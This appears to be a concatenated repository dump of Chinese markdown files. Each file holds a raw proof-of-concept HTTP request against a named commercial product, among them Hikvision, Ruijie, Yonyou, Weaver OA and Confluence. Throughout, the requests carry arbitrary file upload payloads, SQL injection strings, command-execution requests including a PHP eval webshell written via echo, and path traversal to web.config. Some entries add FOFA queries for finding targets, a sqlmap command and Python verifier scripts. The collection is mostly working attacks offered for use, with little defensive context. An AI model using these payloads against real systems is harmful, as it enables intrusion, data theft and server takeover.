AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 9 | Accept-Encoding: gzip, deflate 10 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 11 | Cookie: JSESSIONID=48887e3b-7976-4804-bb6c-17005cad41b1; Language=zh-CN 12 | Connection: close 13 | 
``` 14 | 15 | -------------------------------------------------------------------------------- /百易云资产管理运营系统任意文件上传.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /comfileup.php HTTP/1.1 4 | Host: 5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 7 | Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 8 | Accept-Encoding: gzip, deflate 9 | Connection: close 10 | Content-Type: multipart/form-data; boundary=--------1110146050 11 | 12 | ----------1110146050 13 | Content-Disposition: form-data; name="file";filename="rce.php" 14 | 15 | 16 | ----------1110146050-- 17 | ``` 18 | 19 | -------------------------------------------------------------------------------- /锐捷-EG易网关存在RCE漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 获取用户密码 3 | POST /login.php HTTP/1.1 4 | Host: 10.10.10.10 5 | User-Agent: Go-http-client/1.1 6 | Content-Length: 49 7 | Content-Type: application/x-www-form-urlencoded 8 | X-Requested-With: XMLHttpRequest 9 | Accept-Encoding: gzip 10 | 11 | username=admin&password=admin?show+webmaster+user 12 | 13 | 命令执行 14 | POST /cli.php?a=shell HTTP/1.1 15 | Host: 10.10.10.10 16 | User-Agent: Go-http-client/1.1 17 | Content-Length: 24 18 | Content-Type: application/x-www-form-urlencoded 19 | Cookie: 利用登录后Cookie的RUIJIEID字段进行替换,;user=admin; 20 | X-Requested-With: XMLHttpRequest 21 | Accept-Encoding: gzip 22 | 23 | notdelay=true&command=ls 24 | ``` 25 | 26 | -------------------------------------------------------------------------------- /小学智慧校园信息管理系统 Upload 文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /PSE/Upload HTTP/1.1 3 | Host: x.x.x.x 4 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/55.0.2919.83 Safari/537.36 5 | Content-Type: multipart/form-data; boundary=230982304982309 6 | Connection: close 7 | Content-Length: 239 8 | 9 | --230982304982309 10 | Content-Disposition: form-data; name="file"; filename="Hello.aspx" 11 | Content-Type: image/jpg 12 | 13 | <%@Page Language="C#"%><%Response.Write("HelloWorldTest");System.IO.File.Delete(Request.PhysicalPath);%> 14 | --230982304982309-- 15 | ``` 16 | 17 | ![image-20240729093018380](小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png) -------------------------------------------------------------------------------- /H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 5 | Connection: close 6 | Content-Type: multipart/form-data; boundary=---------------WebKitFormBoundaryMmx988TUuintqO4Q 7 | Accept-Encoding: gzip 8 | Content-Length: 243 9 | 10 | -----------------WebKitFormBoundaryMmx988TUuintqO4Q 11 | Content-Disposition: form-data; name="123.txt"; filename="123.txt" 12 | Content-Type: application/octet-stream 13 | Content-Length: 255 14 | 15 | 1111 16 | -----------------WebKitFormBoundaryMmx988TUuintqO4Q-- 17 | ``` 18 | 19 | -------------------------------------------------------------------------------- /方天云智慧平台系统文件上传.md: -------------------------------------------------------------------------------- 1 | fofa 2 | 3 | body="AjaxMethods.asmx/GetCompanyItem" 4 | 5 | 6 | 7 | 8 | 9 | ``` 10 | POST /Upload.ashx HTTP/1.1 11 | Host: 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 13 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX 14 | Connection: close 15 | 16 | ------WebKitFormBoundarySl8siBbmVicABvTX 17 | Content-Disposition: 
form-data; name="file"; filename="qwe.aspx" 18 | Content-Type: image/jpeg 19 | 20 | <%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%> 21 | ------WebKitFormBoundarySl8siBbmVicABvTX-- 22 | ``` 23 | 24 | UploadFile/CustomerFile/返回的路径名 -------------------------------------------------------------------------------- /润乾报表InputServlet存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /InputServlet?action=12 HTTP/1.1 4 | Host: 120.55.41.98:6868 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 7 | Content-Type: multipart/form-data; boundary=00contentOboundary00 8 | Connection: close 9 | Content-Length: 238 10 | 11 | --00contentOboundary00 12 | Content-Disposition: form-data; name="upsize" 13 | 14 | 1024 15 | --00contentOboundary00 16 | Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\12.jsp" 17 | Content-Type: image/jpeg 18 | 19 | test 20 | --00contentOboundary00-- 21 | ``` 22 | 23 | -------------------------------------------------------------------------------- /赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1 3 | Host: 4 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 5 | Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl 6 | Priority: u=0, i 7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 9 | Accept-Encoding: gzip, deflate 
10 | Upgrade-Insecure-Requests: 1 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- /指尖云平台-智慧政务payslip SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1 3 | Host: xx.xx.xx.xx 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 | Accept-Encoding: gzip, deflate 8 | Connection: close 9 | Cookie: GOASESSID=i589f58naalabocmbidup7edl3 10 | Upgrade-Insecure-Requests: 1 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- /数字通指尖云平台-智慧政务payslip SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1 3 | Host: xx.xx.xx.xx 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 | Accept-Encoding: gzip, deflate 8 | Connection: close 9 | Cookie: GOASESSID=i589f58naalabocmbidup7edl3 10 | Upgrade-Insecure-Requests: 1 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- /资管云--任意文件上传.md: 
--------------------------------------------------------------------------------
```
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: multipart/form-data; boundary=--------1110146050
Content-Length: 117

----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"

test
----------1110146050--
```

--------------------------------------------------------------------------------
/Panalog 日志审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
FOFA:body="Maintain/cloud_index.php"

```
GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1,concat(0x7e,version(),0x7e),1) HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
```

--------------------------------------------------------------------------------
/云课网校系统uploadImage存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip,deflate,br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif


------WebKitFormBoundaryLZbmKeasWgo2gPtU--
```

--------------------------------------------------------------------------------
/安恒明御安全网关rce.md:
--------------------------------------------------------------------------------
```
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"
<%3fphpteval(\$_POST[\"a\"]) ;?>"+>+.xxx.php HTTP/1.1
Host: xxx
Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: multipart/form-data; boundary=--------1110146050
Content-Length: 117

----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"

test
----------1110146050--
```

--------------------------------------------------------------------------------
/金慧综合管理信息系统SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
```

--------------------------------------------------------------------------------
/用友U9-UMWebService.asmx存在文件读取漏洞.md:
--------------------------------------------------------------------------------
```
POST /u9/OnLine/UMWebService.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36
Connection: close
Content-Length: 381
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetLogContent"
Accept-Encoding: gzip





../web.config




```

--------------------------------------------------------------------------------
/金和OA_upload_json.asp存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723

-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="localUrl"


-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
Content-Type: image/png

hhh
-----------------------------153857212076213662067051609723--
```

--------------------------------------------------------------------------------
/创客13星零售商城系统RCE.md:
--------------------------------------------------------------------------------
```
GET /member/my_up_level?phone=%27%29%29%20UNION%20ALL%20SELECT%20CONCAT%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=6qc94pq3rvpu490r1doentg66a
User-Agent: sqlmap/1.8.2.1#dev (https://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```

```
python sqlmap.py -u "http://127.0.0.1/member/my_up_level?phone=*" --level=3 --dbms=mysql --cookie "PHPSESSID=6qc94pq3rvpu490r1doentg66a"
```

--------------------------------------------------------------------------------
/泛微OA E-Office V10 OfficeServer 任意文件上传.md:
--------------------------------------------------------------------------------
```
/eoffice10/server/public/iWebOffice2015/OfficeServer.php
User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
Content - Length':'393'
Content - Type': 'multipart / form - data;
boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept - Encoding': 'gzip, deflate'
Connection':'close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"
Content-Type': 'image/jpeg


------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
Content-Disposition': 'form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}"
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
```

--------------------------------------------------------------------------------
/AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md:
--------------------------------------------------------------------------------
```
GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
Host: localhost
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close
```

--------------------------------------------------------------------------------
/SpringBlade系统menu接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
Connection: close
```

--------------------------------------------------------------------------------
/Confluence远程命令执行漏洞(CVE-2024-21683).md:
--------------------------------------------------------------------------------
```
POST /admin/plugins/newcode/addlanguage.action HTTP/2
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 372
Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39

--f6dae662e22371daece5ff851b1c4a39
Content-Disposition: form-data; name="newLanguageName"

test
--f6dae662e22371daece5ff851b1c4a39
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript

new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start()
--f6dae662e22371daece5ff851b1c4a39--
```

--------------------------------------------------------------------------------
/泛微OA E-Cology存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /services/WorkflowServiceXml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487




1
1
1
1

1=1




```

--------------------------------------------------------------------------------
/泛微E-office-10接口leave_record.php SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
http://{host}/eoffice10/server/ext/system_support/leave_record.php?
flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
```

```
GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

--------------------------------------------------------------------------------
/海康威视综合安防管理平台前台RCE.md:
--------------------------------------------------------------------------------
# Description

The Hikvision integrated security management platform has a remote command execution vulnerability at the /center/api/installation/detection endpoint; an attacker exploiting it can directly obtain control of the server.

### poc

```
POST /center/api/installation/detection HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8

{"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)"}}
```

Visit /vms/static/echo.txt

to check whether it succeeded.

--------------------------------------------------------------------------------
/T18-1TOTOLINK-A6000R-RCE.md:
--------------------------------------------------------------------------------
```
GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1
Host: 192.168.187.136
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=80c79bd6ad9bfba9656b7a8bee2a988f
```

--------------------------------------------------------------------------------
/网康 NS-ASG sql 注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /admin/list_addr_fwresource_ip.php HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=f30e8a16a1b6373bbc11e1ce84445033
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://ip:port
Referer: https://ip:port/admin/list_addr_fwresource_ip.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
ResId%5B%5D=13*&action=delete
```

--------------------------------------------------------------------------------
/AJ-Report开源数据大屏存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
```
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
```

--------------------------------------------------------------------------------
/云时空商业ERP文件上传.md:
--------------------------------------------------------------------------------
```
import requests

def verify(ip):

    url = f'{ip}/uploads/pics/2023-12-6/test.jsp'

    headers = {
        'Content-Type': 'multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388',
    }

    payload = '''
--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="test.jsp"
Content-Type: application/octet-stream

<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--
'''

    try:
        response = requests.post(url, headers=headers, data=payload)
        # Print details when verification succeeds
        if response.status_code == 200 :
            print(f"{ip}存在云时空商业ERP文件上传!!!")
        else:
            print('漏洞不存在。')

    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)
```

--------------------------------------------------------------------------------
/金和OA_jc6_ntko-upload任意文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: you_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Length: 392
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----zqulxi4ku42pfmoelvc0
Connection: close

------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="filename"

../../../../upload/xicxc2sv1n.jsp
------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="upLoadFile"; filename="xicxc2sv1n.jpg"
Content-Type: image/jpeg

<% out.println(111*111); %>
------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="Submit"

upload
------zqulxi4ku42pfmoelvc0--
```

--------------------------------------------------------------------------------
/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md:
--------------------------------------------------------------------------------
```
POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

{
"address":"ftlhbc.dnslog.cn"
}
```

--------------------------------------------------------------------------------
/用友 NC Cloud jsinvoke 任意文件上传.md:
--------------------------------------------------------------------------------
```python
import requests

def verify(ip):

    url = f'{ip}/uapjs/jsinvoke/?action=invoke'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    }
    payload = '''
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["123456","webapps/nc_web/2YIOmzdcUDhwMYTLk65p3cgxvxy.jsp"]}
'''
    try:
        response = requests.post(url, headers=headers, data=payload)
        if response.status_code == 200 :
            print(f"{ip}存在用友 NC Cloud jsinvoke 任意文件上传漏洞!!!")
        else:
